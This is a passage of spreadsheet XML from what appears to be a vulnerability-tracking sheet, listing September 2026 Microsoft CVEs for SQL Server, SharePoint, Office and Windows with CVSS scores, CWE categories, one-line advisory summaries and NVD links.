t="inlineStr" /><c r="H118" s="5" t="n"><v>0.005</v></c><c r="I118" s="5" t="inlineStr" /><c r="J118" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K118" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L118" s="5" t="inlineStr" /><c r="M118" s="5" t="inlineStr" /><c r="N118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P118" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q118" s="5" t="inlineStr" /><c r="R118" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S118" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t></is></c></row><row r="119"><c r="A119" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B119" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C119" s="5" t="inlineStr"><is><t>CVE-2026-67368</t></is></c><c r="D119" s="5" t="n"><v>8.800000000000001</v></c><c r="E119" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F119" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G119" s="5" t="inlineStr" /><c r="H119" s="5" t="n"><v>0.007</v></c><c r="I119" s="5" t="inlineStr" /><c r="J119" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K119" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L119" s="5" t="inlineStr" /><c r="M119" s="5" t="inlineStr" /><c r="N119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O119" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P119" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q119" s="5" t="inlineStr" /><c r="R119" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S119" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t></is></c></row><row r="120"><c r="A120" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B120" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C120" s="5" t="inlineStr"><is><t>CVE-2026-67370</t></is></c><c r="D120" s="5" t="n"><v>8.800000000000001</v></c><c r="E120" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F120" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G120" s="5" t="inlineStr" /><c r="H120" s="5" t="n"><v>0.007</v></c><c r="I120" s="5" t="inlineStr" /><c r="J120" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K120" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L120" s="5" t="inlineStr" /><c r="M120" s="5" t="inlineStr" /><c r="N120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O120" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P120" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q120" s="5" t="inlineStr" /><c r="R120" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S120" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t></is></c></row><row r="121"><c r="A121" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B121" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C121" s="5" t="inlineStr"><is><t>CVE-2026-67373</t></is></c><c r="D121" s="5" t="n"><v>8.800000000000001</v></c><c r="E121" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F121" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G121" s="5" t="inlineStr" /><c r="H121" s="5" t="n"><v>0.006</v></c><c r="I121" s="5" t="inlineStr" /><c r="J121" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K121" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L121" s="5" t="inlineStr" /><c r="M121" s="5" t="inlineStr" /><c r="N121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O121" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P121" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q121" s="5" t="inlineStr" /><c r="R121" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S121" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t></is></c></row><row r="122"><c r="A122" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B122" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C122" s="5" t="inlineStr"><is><t>CVE-2026-67380</t></is></c><c r="D122" s="5" t="n"><v>8.800000000000001</v></c><c r="E122" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F122" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G122" s="5" t="inlineStr" /><c r="H122" s="5" t="n"><v>0.007</v></c><c r="I122" s="5" t="inlineStr" /><c r="J122" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K122" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L122" s="5" t="inlineStr" /><c r="M122" s="5" t="inlineStr" /><c r="N122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O122" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P122" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q122" s="5" t="inlineStr" /><c r="R122" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S122" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t></is></c></row><row r="123"><c r="A123" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B123" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C123" s="5" t="inlineStr"><is><t>CVE-2026-67381</t></is></c><c r="D123" s="5" t="n"><v>8.800000000000001</v></c><c r="E123" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F123" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G123" s="5" t="inlineStr" /><c r="H123" s="5" t="n"><v>0.005</v></c><c r="I123" s="5" t="inlineStr" /><c r="J123" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K123" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L123" s="5" t="inlineStr" /><c r="M123" s="5" t="inlineStr" /><c r="N123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O123" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P123" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q123" s="5" t="inlineStr" /><c r="R123" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S123" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t></is></c></row><row r="124"><c r="A124" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C124" s="5" t="inlineStr"><is><t>CVE-2026-67384</t></is></c><c r="D124" s="5" t="n"><v>8.800000000000001</v></c><c r="E124" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F124" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G124" s="5" t="inlineStr" /><c r="H124" s="5" t="n"><v>0.006</v></c><c r="I124" s="5" t="inlineStr" /><c r="J124" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K124" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L124" s="5" t="inlineStr" /><c r="M124" s="5" t="inlineStr" /><c r="N124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P124" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q124" s="5" t="inlineStr" /><c r="R124" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S124" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t></is></c></row><row r="125"><c r="A125" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B125" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C125" s="5" t="inlineStr"><is><t>CVE-2026-67385</t></is></c><c r="D125" s="5" t="n"><v>8.800000000000001</v></c><c r="E125" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F125" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G125" s="5" t="inlineStr" /><c r="H125" s="5" t="n"><v>0.005</v></c><c r="I125" s="5" t="inlineStr" /><c r="J125" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K125" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L125" s="5" t="inlineStr" /><c r="M125" s="5" t="inlineStr" /><c r="N125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P125" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q125" s="5" t="inlineStr" /><c r="R125" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S125" s="5" t="inlineStr"><is><t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t></is></c></row><row r="126"><c r="A126" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B126" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C126" s="5" t="inlineStr"><is><t>CVE-2026-67388</t></is></c><c r="D126" s="5" t="n"><v>8.800000000000001</v></c><c r="E126" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F126" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G126" s="5" t="inlineStr" /><c r="H126" s="5" t="n"><v>0.005</v></c><c r="I126" s="5" t="inlineStr" /><c r="J126" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K126" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L126" s="5" t="inlineStr" /><c r="M126" s="5" t="inlineStr" /><c r="N126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P126" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q126" s="5" t="inlineStr" /><c r="R126" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S126" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t></is></c></row><row r="127"><c r="A127" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B127" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C127" s="5" t="inlineStr"><is><t>CVE-2026-67638</t></is></c><c r="D127" s="5" t="n"><v>8.800000000000001</v></c><c r="E127" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F127" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G127" s="5" t="inlineStr" /><c r="H127" s="5" t="n"><v>0.007</v></c><c r="I127" s="5" t="inlineStr" /><c r="J127" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K127" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L127" s="5" t="inlineStr" /><c r="M127" s="5" t="inlineStr" /><c r="N127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P127" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q127" s="5" t="inlineStr" /><c r="R127" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S127" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t></is></c></row><row r="128"><c r="A128" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B128" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C128" s="5" t="inlineStr"><is><t>CVE-2026-67639</t></is></c><c r="D128" s="5" t="n"><v>8.800000000000001</v></c><c r="E128" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F128" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G128" s="5" t="inlineStr" /><c r="H128" s="5" t="n"><v>0.007</v></c><c r="I128" s="5" t="inlineStr" /><c r="J128" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K128" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L128" s="5" t="inlineStr" /><c r="M128" s="5" t="inlineStr" /><c r="N128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P128" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q128" s="5" t="inlineStr" /><c r="R128" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S128" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t></is></c></row><row r="129"><c r="A129" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B129" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C129" s="5" t="inlineStr"><is><t>CVE-2026-67642</t></is></c><c r="D129" s="5" t="n"><v>8.800000000000001</v></c><c r="E129" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F129" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G129" s="5" t="inlineStr" /><c r="H129" s="5" t="n"><v>0.005</v></c><c r="I129" s="5" t="inlineStr" /><c r="J129" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K129" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L129" s="5" t="inlineStr" /><c r="M129" s="5" t="inlineStr" /><c r="N129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P129" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q129" s="5" t="inlineStr" /><c r="R129" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S129" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t></is></c></row><row r="130"><c r="A130" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B130" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C130" s="5" t="inlineStr"><is><t>CVE-2026-68775</t></is></c><c r="D130" s="5" t="n"><v>8.800000000000001</v></c><c r="E130" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F130" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G130" s="5" t="inlineStr" /><c r="H130" s="5" t="n"><v>0.005</v></c><c r="I130" s="5" t="inlineStr" /><c r="J130" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K130" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L130" s="5" t="inlineStr" /><c r="M130" s="5" t="inlineStr" /><c r="N130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O130" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P130" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q130" s="5" t="inlineStr" /><c r="R130" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S130" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t></is></c></row><row r="131"><c r="A131" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B131" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C131" s="5" t="inlineStr"><is><t>CVE-2026-68786</t></is></c><c r="D131" s="5" t="n"><v>8.800000000000001</v></c><c r="E131" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F131" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G131" s="5" t="inlineStr" /><c r="H131" s="5" t="n"><v>0.005</v></c><c r="I131" s="5" t="inlineStr" /><c r="J131" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K131" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L131" s="5" t="inlineStr" /><c r="M131" s="5" t="inlineStr" /><c r="N131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P131" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q131" s="5" t="inlineStr" /><c r="R131" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S131" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t></is></c></row><row r="132"><c r="A132" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B132" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C132" s="5" t="inlineStr"><is><t>CVE-2026-68828</t></is></c><c r="D132" s="5" t="n"><v>8.800000000000001</v></c><c r="E132" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F132" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G132" s="5" t="inlineStr" /><c r="H132" s="5" t="n"><v>0.004</v></c><c r="I132" s="5" t="inlineStr" /><c r="J132" s="5" t="inlineStr" /><c r="K132" s="5" t="inlineStr" /><c r="L132" s="5" t="inlineStr" /><c r="M132" s="5" t="inlineStr" /><c r="N132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P132" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q132" s="5" t="inlineStr" /><c r="R132" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S132" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68828</t></is></c></row><row r="133"><c r="A133" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B133" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C133" s="5" t="inlineStr"><is><t>CVE-2026-69266</t></is></c><c r="D133" s="5" t="n"><v>8.800000000000001</v></c><c r="E133" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F133" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G133" s="5" t="inlineStr" /><c r="H133" s="5" t="n"><v>0.004</v></c><c r="I133" s="5" t="inlineStr" /><c r="J133" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K133" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L133" s="5" t="inlineStr" /><c r="M133" s="5" t="inlineStr" /><c r="N133" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O133" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P133" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q133" s="5" t="inlineStr" /><c r="R133" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S133" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t></is></c></row><row r="134"><c r="A134" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B134" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C134" s="5" t="inlineStr"><is><t>CVE-2026-69268</t></is></c><c r="D134" s="5" t="n"><v>8.800000000000001</v></c><c r="E134" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F134" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G134" s="5" t="inlineStr" /><c r="H134" s="5" t="n"><v>0.007</v></c><c r="I134" s="5" t="inlineStr" /><c r="J134" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K134" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L134" s="5" t="inlineStr" /><c r="M134" s="5" t="inlineStr" /><c r="N134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O134" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P134" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q134" s="5" t="inlineStr" /><c r="R134" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S134" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t></is></c></row><row r="135"><c r="A135" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B135" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C135" s="5" t="inlineStr"><is><t>CVE-2026-69273</t></is></c><c r="D135" s="5" t="n"><v>8.800000000000001</v></c><c r="E135" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F135" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G135" s="5" t="inlineStr" /><c r="H135" s="5" t="n"><v>0.005</v></c><c r="I135" s="5" t="inlineStr" /><c r="J135" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K135" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L135" s="5" t="inlineStr" /><c r="M135" s="5" t="inlineStr" /><c r="N135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P135" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q135" s="5" t="inlineStr" /><c r="R135" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S135" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t></is></c></row><row r="136"><c r="A136" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B136" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C136" s="5" t="inlineStr"><is><t>CVE-2026-69282</t></is></c><c r="D136" s="5" t="n"><v>8.800000000000001</v></c><c r="E136" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F136" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G136" s="5" t="inlineStr" /><c r="H136" s="5" t="n"><v>0.005</v></c><c r="I136" s="5" t="inlineStr" /><c r="J136" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K136" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L136" s="5" t="inlineStr" /><c r="M136" s="5" t="inlineStr" /><c r="N136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O136" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P136" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q136" s="5" t="inlineStr" /><c r="R136" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S136" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t></is></c></row><row r="137"><c r="A137" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B137" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C137" s="5" t="inlineStr"><is><t>CVE-2026-69285</t></is></c><c r="D137" s="5" t="n"><v>8.800000000000001</v></c><c r="E137" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F137" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G137" s="5" t="inlineStr" /><c r="H137" s="5" t="n"><v>0.006</v></c><c r="I137" s="5" t="inlineStr" /><c r="J137" s="5" t="inlineStr" /><c r="K137" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L137" s="5" t="inlineStr" /><c r="M137" s="5" t="inlineStr" /><c r="N137" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O137" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P137" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q137" s="5" t="inlineStr" /><c r="R137" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S137" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t></is></c></row><row r="138"><c r="A138" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C138" s="5" t="inlineStr"><is><t>CVE-2026-69291</t></is></c><c r="D138" s="5" t="n"><v>8.800000000000001</v></c><c r="E138" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F138" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G138" s="5" t="inlineStr" /><c r="H138" s="5" t="n"><v>0.006</v></c><c r="I138" s="5" t="inlineStr" /><c r="J138" s="5" t="inlineStr" /><c r="K138" s="5" t="inlineStr" /><c r="L138" s="5" t="inlineStr" /><c r="M138" s="5" t="inlineStr" /><c r="N138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P138" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q138" s="5" t="inlineStr" /><c r="R138" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S138" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t></is></c></row><row r="139"><c r="A139" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B139" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C139" s="5" t="inlineStr"><is><t>CVE-2026-69334</t></is></c><c r="D139" s="5" t="n"><v>8.800000000000001</v></c><c r="E139" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F139" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G139" s="5" t="inlineStr" /><c r="H139" s="5" t="n"><v>0.008</v></c><c r="I139" s="5" t="inlineStr" /><c r="J139" s="5" t="inlineStr" 